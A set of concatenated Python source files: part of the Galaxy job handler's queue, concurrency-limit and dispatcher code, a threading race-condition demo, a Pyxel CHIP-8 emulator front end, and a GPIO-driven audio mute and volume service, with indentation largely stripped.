elif job_state == JOB_INPUT_ERROR:
log.info( "(%d) Job unable to run: one or more inputs in error state" % job.id )
elif job_state == JOB_INPUT_DELETED:
log.info( "(%d) Job unable to run: one or more inputs deleted" % job.id )
elif job_state == JOB_READY:
self.dispatcher.put( self.job_wrappers.pop( job.id ) )
log.info( "(%d) Job dispatched" % job.id )
elif job_state == JOB_DELETED:
log.info( "(%d) Job deleted by user while still queued" % job.id )
elif job_state == JOB_ADMIN_DELETED:
log.info( "(%d) Job deleted by admin while still queued" % job.id )
elif job_state == JOB_USER_OVER_QUOTA:
log.info( "(%d) User (%s) is over quota: job paused" % ( job.id, job.user_id ) )
job.set_state( model.Job.states.PAUSED )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset_assoc.dataset.dataset.state = model.Dataset.states.PAUSED
dataset_assoc.dataset.info = "Execution of this dataset's job is paused because you were over your disk quota at the time it was ready to run"
self.sa_session.add( dataset_assoc.dataset.dataset )
self.sa_session.add( job )
elif job_state == JOB_ERROR:
log.error( "(%d) Error checking job readiness" % job.id )
else:
log.error( "(%d) Job in unknown state '%s'" % ( job.id, job_state ) )
new_waiting_jobs.append( job.id )
except Exception:
log.exception( "failure running job %d" % job.id )
# Update the waiting list
if not self.track_jobs_in_database:
self.waiting_jobs = new_waiting_jobs
# Remove cached wrappers for any jobs that are no longer being tracked
for id in self.job_wrappers.keys():
if id not in new_waiting_jobs:
del self.job_wrappers[id]
# Flush, if we updated the state
self.sa_session.flush()
# Done with the session
self.sa_session.remove()
def __check_job_state( self, job ):
"""
Check if a job is ready to run by verifying that each of its input
datasets is ready (specifically in the OK state). If any input dataset
has an error, fail the job and return JOB_INPUT_ERROR. If any input
dataset is deleted, fail the job and return JOB_INPUT_DELETED. If all
input datasets are in OK state, return JOB_READY indicating that the
job can be dispatched. Otherwise, return JOB_WAIT indicating that input
datasets are still being prepared.
"""
if not self.track_jobs_in_database:
in_memory_not_ready_state = self.__verify_in_memory_job_inputs( job )
if in_memory_not_ready_state:
return in_memory_not_ready_state
# Else, if tracking in the database, job.state is guaranteed to be NEW and
# the inputs are guaranteed to be OK.
# Create the job wrapper so that the destination can be set
job_id = job.id
job_wrapper = self.job_wrappers.get( job_id, None )
if not job_wrapper:
job_wrapper = self.job_wrapper( job )
self.job_wrappers[ job_id ] = job_wrapper
# If state == JOB_READY, assume job_destination also set - otherwise
# in case of various error or cancelled states do not assume
# destination has been set.
state, job_destination = self.__verify_job_ready( job, job_wrapper )
if state == JOB_READY:
# PASS. increase usage by one job (if caching) so that multiple jobs aren't dispatched on this queue iteration
self.increase_running_job_count(job.user_id, job_destination.id )
return state
def __verify_job_ready( self, job, job_wrapper ):
""" Compute job destination and verify job is ready at that
destination by checking job limits and quota. If this method
returns a job state of JOB_READY - it MUST also return a job
destination.
"""
job_destination = None
try:
assert job_wrapper.tool is not None, 'This tool was disabled before the job completed. Please contact your Galaxy administrator.'
# Cause the job_destination to be set and cached by the mapper
job_destination = job_wrapper.job_destination
except AssertionError as e:
log.warning( "(%s) Tool '%s' removed from tool config, unable to run job" % ( job.id, job.tool_id ) )
job_wrapper.fail( e )
return JOB_ERROR, job_destination
except JobNotReadyException as e:
job_state = e.job_state or JOB_WAIT
return job_state, None
except Exception as e:
failure_message = getattr( e, 'failure_message', DEFAULT_JOB_PUT_FAILURE_MESSAGE )
if failure_message == DEFAULT_JOB_PUT_FAILURE_MESSAGE:
log.exception( 'Failed to generate job destination' )
else:
log.debug( "Intentionally failing job with message (%s)" % failure_message )
job_wrapper.fail( failure_message )
return JOB_ERROR, job_destination
# job is ready to run, check limits
# TODO: these checks should be refactored to minimize duplication and made more modular/pluggable
state = self.__check_destination_jobs( job, job_wrapper )
if state == JOB_READY:
state = self.__check_user_jobs( job, job_wrapper )
if state == JOB_READY and self.app.config.enable_quotas:
quota = self.app.quota_agent.get_quota( job.user )
if quota is not None:
try:
usage = self.app.quota_agent.get_usage( user=job.user, history=job.history )
if usage > quota:
return JOB_USER_OVER_QUOTA, job_destination
except AssertionError as e:
pass # No history, should not happen with an anon user
return state, job_destination
def __verify_in_memory_job_inputs( self, job ):
""" Perform the same checks that happen via SQL for in-memory managed
jobs.
"""
if job.state == model.Job.states.DELETED:
return JOB_DELETED
elif job.state == model.Job.states.ERROR:
return JOB_ADMIN_DELETED
for dataset_assoc in job.input_datasets + job.input_library_datasets:
idata = dataset_assoc.dataset
if not idata:
continue
# don't run jobs for which the input dataset was deleted
if idata.deleted:
self.job_wrappers.pop(job.id, self.job_wrapper( job )).fail( "input data %s (file: %s) was deleted before the job started" % ( idata.hid, idata.file_name ) )
return JOB_INPUT_DELETED
# an error in the input data causes us to bail immediately
elif idata.state == idata.states.ERROR:
self.job_wrappers.pop(job.id, self.job_wrapper( job )).fail( "input data %s is in error state" % ( idata.hid ) )
return JOB_INPUT_ERROR
elif idata.state == idata.states.FAILED_METADATA:
self.job_wrappers.pop(job.id, self.job_wrapper( job )).fail( "input data %s failed to properly set metadata" % ( idata.hid ) )
return JOB_INPUT_ERROR
elif idata.state != idata.states.OK and not ( idata.state == idata.states.SETTING_METADATA and job.tool_id is not None and job.tool_id == self.app.datatypes_registry.set_external_metadata_tool.id ):
# need to requeue
return JOB_WAIT
# All inputs ready to go.
return None
def __clear_job_count( self ):
self.user_job_count = None
self.user_job_count_per_destination = None
self.total_job_count_per_destination = None
def get_user_job_count(self, user_id):
self.__cache_user_job_count()
# This could have been incremented by a previous job dispatched on this iteration, even if we're not caching
rval = self.user_job_count.get(user_id, 0)
if not self.app.config.cache_user_job_count:
result = self.sa_session.execute(select([func.count(model.Job.table.c.id)])
.where(and_(model.Job.table.c.state.in_((model.Job.states.QUEUED,
model.Job.states.RUNNING,
model.Job.states.RESUBMITTED)),
(model.Job.table.c.user_id == user_id))))
for row in result:
# there should only be one row
rval += row[0]
return rval
def __cache_user_job_count( self ):
# Cache the job count if necessary
if self.user_job_count is None and self.app.config.cache_user_job_count:
self.user_job_count = {}
query = self.sa_session.execute(select([model.Job.table.c.user_id, func.count(model.Job.table.c.user_id)])
.where(and_(model.Job.table.c.state.in_((model.Job.states.QUEUED,
model.Job.states.RUNNING,
model.Job.states.RESUBMITTED)),
(model.Job.table.c.user_id != null())))
.group_by(model.Job.table.c.user_id))
for row in query:
self.user_job_count[row[0]] = row[1]
elif self.user_job_count is None:
self.user_job_count = {}
def get_user_job_count_per_destination(self, user_id):
self.__cache_user_job_count_per_destination()
cached = self.user_job_count_per_destination.get(user_id, {})
if self.app.config.cache_user_job_count:
rval = cached
else:
# The cached count is still used even when we're not caching, it is
# incremented when a job is run by this handler to ensure that
# multiple jobs can't get past the limits in one iteration of the
# queue.
rval = {}
rval.update(cached)
result = self.sa_session.execute(select([model.Job.table.c.destination_id, func.count(model.Job.table.c.destination_id).label('job_count')])
.where(and_(model.Job.table.c.state.in_((model.Job.states.QUEUED, model.Job.states.RUNNING)), (model.Job.table.c.user_id == user_id)))
.group_by(model.Job.table.c.destination_id))
for row in result:
# Add the count from the database to the cached count
rval[row['destination_id']] = rval.get(row['destination_id'], 0) + row['job_count']
return rval
def __cache_user_job_count_per_destination(self):
# Cache the job count if necessary
if self.user_job_count_per_destination is None and self.app.config.cache_user_job_count:
self.user_job_count_per_destination = {}
result = self.sa_session.execute(select([model.Job.table.c.user_id, model.Job.table.c.destination_id, func.count(model.Job.table.c.user_id).label('job_count')])
.where(and_(model.Job.table.c.state.in_((model.Job.states.QUEUED, model.Job.states.RUNNING))))
.group_by(model.Job.table.c.user_id, model.Job.table.c.destination_id))
for row in result:
if row['user_id'] not in self.user_job_count_per_destination:
self.user_job_count_per_destination[row['user_id']] = {}
self.user_job_count_per_destination[row['user_id']][row['destination_id']] = row['job_count']
elif self.user_job_count_per_destination is None:
self.user_job_count_per_destination = {}
def increase_running_job_count(self, user_id, destination_id):
if self.app.job_config.limits.registered_user_concurrent_jobs or \
self.app.job_config.limits.anonymous_user_concurrent_jobs or \
self.app.job_config.limits.destination_user_concurrent_jobs:
if self.user_job_count is None:
self.user_job_count = {}
if self.user_job_count_per_destination is None:
self.user_job_count_per_destination = {}
self.user_job_count[user_id] = self.user_job_count.get(user_id, 0) + 1
if user_id not in self.user_job_count_per_destination:
self.user_job_count_per_destination[user_id] = {}
self.user_job_count_per_destination[user_id][destination_id] = self.user_job_count_per_destination[user_id].get(destination_id, 0) + 1
if self.app.job_config.limits.destination_total_concurrent_jobs:
if self.total_job_count_per_destination is None:
self.total_job_count_per_destination = {}
self.total_job_count_per_destination[destination_id] = self.total_job_count_per_destination.get(destination_id, 0) + 1
def __check_user_jobs( self, job, job_wrapper ):
# TODO: Update output datasets' _state = LIMITED or some such new
# state, so the UI can reflect what jobs are waiting due to concurrency
# limits
if job.user:
# Check the hard limit first
if self.app.job_config.limits.registered_user_concurrent_jobs:
count = self.get_user_job_count(job.user_id)
# Check the user's number of dispatched jobs against the overall limit
if count >= self.app.job_config.limits.registered_user_concurrent_jobs:
return JOB_WAIT
# If we pass the hard limit, also check the per-destination count
id = job_wrapper.job_destination.id
count_per_id = self.get_user_job_count_per_destination(job.user_id)
if id in self.app.job_config.limits.destination_user_concurrent_jobs:
count = count_per_id.get(id, 0)
# Check the user's number of dispatched jobs in the assigned destination id against the limit for that id
if count >= self.app.job_config.limits.destination_user_concurrent_jobs[id]:
return JOB_WAIT
# If we pass the destination limit (if there is one), also check limits on any tags (if any)
if job_wrapper.job_destination.tags:
for tag in job_wrapper.job_destination.tags:
# Check each tag for this job's destination
if tag in self.app.job_config.limits.destination_user_concurrent_jobs:
# Only if there's a limit defined for this tag
count = 0
for id in [ d.id for d in self.app.job_config.get_destinations(tag) ]:
# Add up the aggregate job total for this tag
count += count_per_id.get(id, 0)
if count >= self.app.job_config.limits.destination_user_concurrent_jobs[tag]:
return JOB_WAIT
elif job.galaxy_session:
# Anonymous users only get the hard limit
if self.app.job_config.limits.anonymous_user_concurrent_jobs:
count = self.sa_session.query( model.Job ).enable_eagerloads( False ) \
.filter( and_( model.Job.session_id == job.galaxy_session.id,
or_( model.Job.state == model.Job.states.RUNNING,
model.Job.state == model.Job.states.QUEUED ) ) ).count()
if count >= self.app.job_config.limits.anonymous_user_concurrent_jobs:
return JOB_WAIT
else:
log.warning( 'Job %s is not associated with a user or session so job concurrency limit cannot be checked.' % job.id )
return JOB_READY
def __cache_total_job_count_per_destination( self ):
# Cache the job count if necessary
if self.total_job_count_per_destination is None:
self.total_job_count_per_destination = {}
result = self.sa_session.execute(select([model.Job.table.c.destination_id, func.count(model.Job.table.c.destination_id).label('job_count')])
.where(and_(model.Job.table.c.state.in_((model.Job.states.QUEUED, model.Job.states.RUNNING))))
.group_by(model.Job.table.c.destination_id))
for row in result:
self.total_job_count_per_destination[row['destination_id']] = row['job_count']
def get_total_job_count_per_destination(self):
self.__cache_total_job_count_per_destination()
# Always use caching (at worst a job will have to wait one iteration,
# and this would be more fair anyway as it ensures FIFO scheduling,
# insofar as FIFO would be fair...)
return self.total_job_count_per_destination
def __check_destination_jobs( self, job, job_wrapper ):
if self.app.job_config.limits.destination_total_concurrent_jobs:
id = job_wrapper.job_destination.id
count_per_id = self.get_total_job_count_per_destination()
if id in self.app.job_config.limits.destination_total_concurrent_jobs:
count = count_per_id.get(id, 0)
# Check the number of dispatched jobs in the assigned destination id against the limit for that id
if count >= self.app.job_config.limits.destination_total_concurrent_jobs[id]:
return JOB_WAIT
# If we pass the destination limit (if there is one), also check limits on any tags (if any)
if job_wrapper.job_destination.tags:
for tag in job_wrapper.job_destination.tags:
# Check each tag for this job's destination
if tag in self.app.job_config.limits.destination_total_concurrent_jobs:
# Only if there's a limit defined for this tag
count = 0
for id in [ d.id for d in self.app.job_config.get_destinations(tag) ]:
# Add up the aggregate job total for this tag
count += count_per_id.get(id, 0)
if count >= self.app.job_config.limits.destination_total_concurrent_jobs[tag]:
return JOB_WAIT
return JOB_READY
def put( self, job_id, tool_id ):
"""Add a job to the queue (by job identifier)"""
if not self.track_jobs_in_database:
self.queue.put( ( job_id, tool_id ) )
self.sleeper.wake()
def shutdown( self ):
"""Attempts to gracefully shut down the worker thread"""
if self.parent_pid != os.getpid():
# We're not the real job queue, do nothing
return
else:
log.info( "sending stop signal to worker thread" )
self.running = False
if not self.app.config.track_jobs_in_database:
self.queue.put( self.STOP_SIGNAL )
self.sleeper.wake()
log.info( "job handler queue stopped" )
self.dispatcher.shutdown()
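# The monitor loops in this module sleep via self.sleeper.sleep( 1 ) and are woken
# early by put()/shutdown() calling self.sleeper.wake(). The Sleeper helper itself is
# defined elsewhere in this file; the snippet below is only an illustrative sketch of
# how such an interruptible sleep can be built on threading.Condition, and is not
# Galaxy's actual implementation (the name _SleeperSketch is invented here).
import threading

class _SleeperSketch( object ):
    """Interruptible sleep: sleep() blocks for up to `seconds`, wake() returns early."""
    def __init__( self ):
        self.condition = threading.Condition()
    def sleep( self, seconds ):
        with self.condition:
            self.condition.wait( seconds )
    def wake( self ):
        with self.condition:
            self.condition.notify_all()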
class JobHandlerStopQueue( object ):
"""
A queue for jobs which need to be terminated prematurely.
"""
STOP_SIGNAL = object()
def __init__( self, app, dispatcher ):
self.app = app
self.dispatcher = dispatcher
self.sa_session = app.model.context
# Keep track of the pid that started the job manager, only it
# has valid threads
self.parent_pid = os.getpid()
# Contains new jobs. Note this is not used if track_jobs_in_database is True
self.queue = Queue()
# Contains jobs that are waiting (only use from monitor thread)
self.waiting = []
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.running = True
self.monitor_thread = threading.Thread( name="JobHandlerStopQueue.monitor_thread", target=self.monitor )
self.monitor_thread.setDaemon( True )
self.monitor_thread.start()
log.info( "job handler stop queue started" )
def monitor( self ):
"""
Continually iterate the waiting jobs, stop any that are found.
"""
# HACK: Delay until after forking, we need a way to do post fork notification!!!
time.sleep( 10 )
while self.running:
try:
self.monitor_step()
except:
log.exception( "Exception in monitor_step" )
# Sleep
self.sleeper.sleep( 1 )
def monitor_step( self ):
"""
Called repeatedly by `monitor` to stop jobs.
"""
# Pull all new jobs from the queue at once
jobs_to_check = []
if self.app.config.track_jobs_in_database:
# Clear the session so we get fresh states for job and all datasets
self.sa_session.expunge_all()
# Fetch all new jobs
newly_deleted_jobs = self.sa_session.query( model.Job ).enable_eagerloads( False ) \
.filter( ( model.Job.state == model.Job.states.DELETED_NEW ) &
( model.Job.handler == self.app.config.server_name ) ).all()
for job in newly_deleted_jobs:
jobs_to_check.append( ( job, job.stderr ) )
# Also pull from the queue (in the case of Administrative stopped jobs)
try:
while 1:
message = self.queue.get_nowait()
if message is self.STOP_SIGNAL:
return
# Unpack the message
job_id, error_msg = message
# Get the job object and append to watch queue
jobs_to_check.append( ( self.sa_session.query( model.Job ).get( job_id ), error_msg ) )
except Empty:
pass
for job, error_msg in jobs_to_check:
if ( job.state not in
( job.states.DELETED_NEW,
job.states.DELETED ) and
job.finished ):
# terminated before it got here
log.debug('Job %s already finished, not deleting or stopping', job.id)
continue
final_state = job.states.DELETED
if error_msg is not None:
final_state = job.states.ERROR
job.info = error_msg
job.set_final_state( final_state )
self.sa_session.add( job )
self.sa_session.flush()
if job.job_runner_name is not None:
# tell the dispatcher to stop the job
self.dispatcher.stop( job )
def put( self, job_id, error_msg=None ):
if not self.app.config.track_jobs_in_database:
self.queue.put( ( job_id, error_msg ) )
def shutdown( self ):
"""Attempts to gracefully shut down the worker thread"""
if self.parent_pid != os.getpid():
# We're not the real job queue, do nothing
return
else:
log.info( "sending stop signal to worker thread" )
self.running = False
if not self.app.config.track_jobs_in_database:
self.queue.put( self.STOP_SIGNAL )
self.sleeper.wake()
log.info( "job handler stop queue stopped" )
class DefaultJobDispatcher( object ):
def __init__( self, app ):
self.app = app
self.job_runners = self.app.job_config.get_job_runner_plugins( self.app.config.server_name )
# Once plugins are loaded, all job destinations that were created from
# URLs can have their URL params converted to the destination's param
# dict by the plugin.
self.app.job_config.convert_legacy_destinations(self.job_runners)
log.debug( "Loaded job runners plugins: " + ':'.join( self.job_runners.keys() ) )
def __get_runner_name( self, job_wrapper ):
if job_wrapper.can_split():
runner_name = "tasks"
else:
runner_name = job_wrapper.job_destination.runner
return runner_name
def url_to_destination( self, url ):
"""This is used by the runner mapper (a.k.a. dynamic runner) and
recovery methods to have runners convert URLs to destinations.
New-style runner plugin IDs must match the URL's scheme for this to work.
"""
runner_name = url.split(':', 1)[0]
try:
return self.job_runners[runner_name].url_to_destination(url)
except Exception as e:
log.exception("Unable to convert legacy job runner URL '%s' to job destination, destination will be the '%s' runner with no params: %s" % (url, runner_name, e))
return JobDestination(runner=runner_name)
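# For example, a legacy URL such as 'drmaa://native_options/' would resolve to the
# 'drmaa' runner plugin here, whose url_to_destination() turns the URL parameters
# into destination params (the URL above is made up purely for illustration).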
def put( self, job_wrapper ):
runner_name = self.__get_runner_name( job_wrapper )
try:
if isinstance(job_wrapper, TaskWrapper):
# DBTODO Refactor
log.debug( "(%s) Dispatching task %s to %s runner" % ( job_wrapper.job_id, job_wrapper.task_id, runner_name ) )
else:
log.debug( "(%s) Dispatching to %s runner" % ( job_wrapper.job_id, runner_name ) )
self.job_runners[runner_name].put( job_wrapper )
except KeyError:
log.error( 'put(): (%s) Invalid job runner: %s' % ( job_wrapper.job_id, runner_name ) )
job_wrapper.fail( DEFAULT_JOB_PUT_FAILURE_MESSAGE )
def stop( self, job ):
"""
Stop the given job. The input variable job may be either a Job or a Task.
"""
# The Job and Task classes have been modified so that their accessors
# will return the appropriate value.
# Note that Jobs and Tasks have runner_names, which are distinct from
# the job_runner_name and task_runner_name.
if ( isinstance( job, model.Job ) ):
log.debug( "Stopping job %d:", job.get_id() )
elif( isinstance( job, model.Task ) ):
log.debug( "Stopping job %d, task %d"
% ( job.get_job().get_id(), job.get_id() ) )
else:
log.debug( "Unknown job to stop" )
# The runner name is not set until the job has started.
# If we're stopping a task, then the runner_name may be
# None, in which case it hasn't been scheduled.
if ( job.get_job_runner_name() is not None ):
runner_name = ( job.get_job_runner_name().split( ":", 1 ) )[ 0 ]
if ( isinstance( job, model.Job ) ):
log.debug( "stopping job %d in %s runner" % ( job.get_id(), runner_name ) )
elif ( isinstance( job, model.Task ) ):
log.debug( "Stopping job %d, task %d in %s runner"
% ( job.get_job().get_id(), job.get_id(), runner_name ) )
try:
self.job_runners[runner_name].stop_job( job )
except KeyError:
log.error( 'stop(): (%s) Invalid job runner: %s' % ( job.get_id(), runner_name ) )
# Job and output dataset states have already been updated, so nothing is done here.
def recover( self, job, job_wrapper ):
runner_name = ( job.job_runner_name.split(":", 1) )[0]
log.debug( "recovering job %d in %s runner" % ( job.get_id(), runner_name ) )
try:
self.job_runners[runner_name].recover( job, job_wrapper )
except KeyError:
log.error( 'recover(): (%s) Invalid job runner: %s' % ( job_wrapper.job_id, runner_name ) )
job_wrapper.fail( DEFAULT_JOB_PUT_FAILURE_MESSAGE )
def shutdown( self ):
for runner in self.job_runners.itervalues():
runner.shutdown()
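# The limit checks in JobHandlerQueue.__check_user_jobs / __check_destination_jobs
# boil down to comparing cached per-user and per-destination job counts against
# configured caps. The standalone sketch below illustrates only that counting logic;
# the names (check_user_limit_sketch, user_counts, limits, ...) are invented for the
# example and are not Galaxy APIs.
def check_user_limit_sketch( user_id, destination_id, user_counts, per_dest_counts, limits ):
    """Return 'wait' if a configured concurrency limit is already met, else 'ready'."""
    hard_cap = limits.get( 'registered_user_concurrent_jobs' )
    if hard_cap and user_counts.get( user_id, 0 ) >= hard_cap:
        return 'wait'
    dest_caps = limits.get( 'destination_user_concurrent_jobs', {} )
    dest_cap = dest_caps.get( destination_id )
    if dest_cap and per_dest_counts.get( user_id, {} ).get( destination_id, 0 ) >= dest_cap:
        return 'wait'
    return 'ready'

# Example: a user already running 3 jobs against a hard cap of 3 must wait:
# check_user_limit_sketch( 7, 'local', { 7: 3 }, { 7: { 'local': 2 } },
#                          { 'registered_user_concurrent_jobs': 3 } )  # -> 'wait'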
|
thread_05_1.py
|
# thread_05_1.py
import threading
Q = 100000
thread_list = []
def drink(max):
global Q
for i in range(0, max):
Q -= 1
for i in range(0, 2):
thread_inst = threading.Thread(target=drink, args=(50000,))
thread_list.append(thread_inst) # store the created thread in thread_list
thread_inst.start() # start the thread
for thread in thread_list:
thread.join() # wait until every thread in thread_list has finished
print(Q) # print the value of Q
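# The unsynchronized "Q -= 1" above is a read-modify-write (load, subtract, store),
# so a thread switch between the load and the store can lose decrements and the final
# print(Q) may not be 0. Below is a minimal variant that guards the shared counter
# with a threading.Lock; it is an illustrative addition, not part of the original
# exercise (Q2, drink_locked are names invented for the example).
import threading

Q2 = 100000
lock = threading.Lock()

def drink_locked(max_count):
    global Q2
    for _ in range(max_count):
        with lock:  # serialize the read-modify-write on the shared counter
            Q2 -= 1

threads = [threading.Thread(target=drink_locked, args=(50000,)) for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(Q2)  # always 0, because the decrement is protected by the lock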
|
Chip8Mini.py
|
# Chip8Mini v0.1: A CHIP8 emulator in Pyxel/Python
# Copyright (c) 2022 Kumogata Computing Laboratory.
# All Rights Reserved.
import pyxel
import sys # used below for sys.argv and sys.exit
import threading
from System import *
class Chip8Mini:
# Constants
width = 64
height = 32
cabinet_width = 80
cabinet_height = 120
# 0: amabie 1: breakout 2: reserved 3: reserved
# 4: reserved 5: reserved 6: reserved 7: reserved
theme = 1
# References
_Sys = None
# ------------------------------------------------------------
# Main Routine
# ------------------------------------------------------------
# Constructor
def __init__( self ):
pyxel.init( self.cabinet_width, self.cabinet_height,
title="Chip8Mini v0.1", fps=20)
if self.theme == 0:
pyxel.load( "Amabie.pyxres")
elif self.theme == 1:
pyxel.load( "Breakout.pyxres")
# Create Chip8's System
self._Sys = System()
# Initialize Chip8's System
if ( len( sys.argv ) < 2 or
self._Sys.Init( self, sys.argv[ 1 ] ) < 0 ) :
# Failed
print ("Usage: python " + sys.argv[ 0 ] + " <ROM file name>")
sys.exit()
# Start Chip8's System
threading.Thread(target=self._Sys.Run, args=()).start()
# Start Pyxel's System
pyxel.run(self.update,self.draw)
def update( self ):
# Key Events
self.update_key_press()
self.update_key_release()
def draw( self ):
pyxel.cls(0)
pyxel.blt(0, 0, 0, 0, 0, self.cabinet_width, self.cabinet_height)
for _y in range( self.height ) :
for _x in range( self.width ) :
if ( self._Sys._PPU.PPU_GetPixel( _x, _y ) ) :
# Draw Rectangle
pyxel.pset( _x+8,_y+24,13)
else :
# Draw None
pyxel.pset( _x+8,_y+24,1)
# Original |1|2|3|C|   Mapping to   |1|2|3|4|
#          |4|5|6|D|                |Q|W|E|R|
#          |7|8|9|E|                |A|S|D|F|
#          |A|0|B|F|                |Z|X|C|V|
# Key Pressed
def update_key_press( self ):
if pyxel.btnp( pyxel.KEY_X ) :
self._Sys._IO.Key |= ( 1 << 0 )
if pyxel.btnp( pyxel.KEY_1 ) :
self._Sys._IO.Key |= ( 1 << 1 )
if pyxel.btnp( pyxel.KEY_2 ) :
self._Sys._IO.Key |= ( 1 << 2 )
if pyxel.btnp( pyxel.KEY_3 ) :
self._Sys._IO.Key |= ( 1 << 3 )
if pyxel.btnp( pyxel.KEY_Q ) :
self._Sys._IO.Key |= ( 1 << 4 )
if pyxel.btnp( pyxel.KEY_W ) :
self._Sys._IO.Key |= ( 1 << 5 )
if pyxel.btnp( pyxel.KEY_E ) :
self._Sys._IO.Key |= ( 1 << 6 )
if pyxel.btnp( pyxel.KEY_A ) :
self._Sys._IO.Key |= ( 1 << 7 )
if pyxel.btnp( pyxel.KEY_S ) :
self._Sys._IO.Key |= ( 1 << 8 )
if pyxel.btnp( pyxel.KEY_D ) :
self._Sys._IO.Key |= ( 1 << 9 )
if pyxel.btnp( pyxel.KEY_Z ) :
self._Sys._IO.Key |= ( 1 << 10 )
if pyxel.btnp( pyxel.KEY_C ) :
self._Sys._IO.Key |= ( 1 << 11 )
if pyxel.btnp( pyxel.KEY_4 ) :
self._Sys._IO.Key |= ( 1 << 12 )
if pyxel.btnp( pyxel.KEY_R ) :
self._Sys._IO.Key |= ( 1 << 13 )
if pyxel.btnp( pyxel.KEY_F ) :
self._Sys._IO.Key |= ( 1 << 14 )
if pyxel.btnp( pyxel.KEY_V ) :
self._Sys._IO.Key |= ( 1 << 15 )
# Key Released
def update_key_release( self ):
if pyxel.btnr( pyxel.KEY_X ) :
self._Sys._IO.Key &= ~( 1 << 0 )
if pyxel.btnr( pyxel.KEY_1 ) :
self._Sys._IO.Key &= ~( 1 << 1 )
if pyxel.btnr( pyxel.KEY_2 ) :
self._Sys._IO.Key &= ~( 1 << 2 )
if pyxel.btnr( pyxel.KEY_3 ) :
self._Sys._IO.Key &= ~( 1 << 3 )
if pyxel.btnr( pyxel.KEY_Q ) :
self._Sys._IO.Key &= ~( 1 << 4 )
if pyxel.btnr( pyxel.KEY_W ) :
self._Sys._IO.Key &= ~( 1 << 5 )
if pyxel.btnr( pyxel.KEY_E ) :
self._Sys._IO.Key &= ~( 1 << 6 )
if pyxel.btnr( pyxel.KEY_A ) :
self._Sys._IO.Key &= ~( 1 << 7 )
if pyxel.btnr( pyxel.KEY_S ) :
self._Sys._IO.Key &= ~( 1 << 8 )
if pyxel.btnr( pyxel.KEY_D ) :
self._Sys._IO.Key &= ~( 1 << 9 )
if pyxel.btnr( pyxel.KEY_Z ) :
self._Sys._IO.Key &= ~( 1 << 10 )
if pyxel.btnr( pyxel.KEY_C ) :
self._Sys._IO.Key &= ~( 1 << 11 )
if pyxel.btnr( pyxel.KEY_4 ) :
self._Sys._IO.Key &= ~( 1 << 12 )
if pyxel.btnr( pyxel.KEY_R ) :
self._Sys._IO.Key &= ~( 1 << 13 )
if pyxel.btnr( pyxel.KEY_F ) :
self._Sys._IO.Key &= ~( 1 << 14 )
if pyxel.btnr( pyxel.KEY_V ) :
self._Sys._IO.Key &= ~( 1 << 15 )
# Main
Chip8Mini()
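# The two key handlers above repeat the same btnp/btnr pattern for each of the 16
# CHIP-8 keys. The helper below is an illustrative, table-driven sketch of the same
# mapping; CHIP8_KEY_BITS and update_chip8_keys are names invented here and are not
# part of the emulator above.
CHIP8_KEY_BITS = {
    pyxel.KEY_X: 0,  pyxel.KEY_1: 1,  pyxel.KEY_2: 2,  pyxel.KEY_3: 3,
    pyxel.KEY_Q: 4,  pyxel.KEY_W: 5,  pyxel.KEY_E: 6,  pyxel.KEY_A: 7,
    pyxel.KEY_S: 8,  pyxel.KEY_D: 9,  pyxel.KEY_Z: 10, pyxel.KEY_C: 11,
    pyxel.KEY_4: 12, pyxel.KEY_R: 13, pyxel.KEY_F: 14, pyxel.KEY_V: 15,
}

def update_chip8_keys( io ):
    """Set/clear the bit for every CHIP-8 key pressed/released this frame."""
    for key, bit in CHIP8_KEY_BITS.items():
        if pyxel.btnp( key ):
            io.Key |= ( 1 << bit )
        if pyxel.btnr( key ):
            io.Key &= ~( 1 << bit )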
|
audioService.py
|
import zmq
import time
import sys
from matrix_io.proto.malos.v1 import driver_pb2
from pyObj import Data
from matrix_io.proto.malos.v1 import io_pb2
from multiprocessing import Process
from zmq.eventloop import ioloop, zmqstream
from callbacks import register_data_callback, driver_keep_alive
from mixer import Mixer
matrix_ip = '127.0.0.1' #IP of the matrix
gpio_port = 20049 #Port for the GPIO
context = zmq.Context()
socket = context.socket(zmq.PUSH)
socket.connect('tcp://{0}:{1}'.format(matrix_ip, gpio_port)) #Connect to zmq server
mixer = Mixer() #Open a sound mixer
audioToggleMute = 0 #Matrix GPIO pin 0
audioLevelDown = 1 #Matrix GPIO pin 1
audioLevelUp = 2 #Matrix GPIO pin 2
mikeToggleMute = 3 #Matrix GPIO pin 3
decreaseLevel = -2 #Reduces volume by x
increaseLevel = 2 #Increases volume by x
def config_gpio_read():
""" Send driver configuration to Matrix """
config = driver_pb2.DriverConfig()
config.delay_between_updates = 0.1 #0.1 seconds
config.timeout_after_last_ping = 5 #5 seconds
socket.send(config.SerializeToString())
reset = True #Boolean to know if a volume button is pressed
toggleMic = True #Boolean to know if the mic mute button is pressed
toggleOut = True #Boolean to know if the output mute button is pressed
ledContext = zmq.Context()
ledService = ledContext.socket(zmq.REQ)
ledService.connect ("tcp://localhost:1337")
def gpio_callback(msg):
"""
Receive the updated GPIO values and act upon the pressed button.
Mutes the audio output, changes the volume level or mutes the microphone.
"""
data = io_pb2.GpioParams().FromString(msg[0])
gpioValues = ('{0:016b}'.format(data.values))
gpioValues = gpioValues[::-1]
gpioValues = list(gpioValues)
global ledService
global reset
global toggleMic
global toggleOut
if gpioValues[audioToggleMute] == '0' and toggleOut == True:
#If the audio mute button is pressed mute the speakers and show audio mute leds
if mixer.toggleOutMute():
ledService.send_pyobj(Data("mute", mixer._outMuted, mixer._inMuted, loop=True, force=True))
elif not mixer._outMuted and mixer._inMuted:
ledService.send_pyobj(Data("mute", mixer._outMuted, mixer._inMuted, loop=True, force=True))
else:
#If nothing is muted reset the leds once.
ledService.send_pyobj(Data(force=True))
ledService.recv()
#Toggle to know we are currently pressing the button.
toggleOut = False
elif gpioValues[audioLevelDown] == '0' and not mixer._outMuted and not mixer._inMuted:
#If the audio level down button is pressed decrease the volume and show an animation
mixer.setVolume(decreaseLevel)
#Toggle to know when the volume button is pressed
reset = False
ledService.send_pyobj(Data("volume", int((18/100)*mixer._outLevel), loop=True))
ledService.recv()
elif gpioValues[audioLevelUp] == '0' and not mixer._outMuted and not mixer._inMuted:
#If the audio level up button is pressed increase the volume and show an animation
mixer.setVolume(increaseLevel)
#Toggle to know when the volume button is pressed
reset = False
ledService.send_pyobj(Data("volume", int((18/100)*mixer._outLevel), loop=True))
ledService.recv()
elif gpioValues[mikeToggleMute] == '0' and toggleMic == True:
#If the microphone mute button is pressed mute the microphone and show audio mute leds
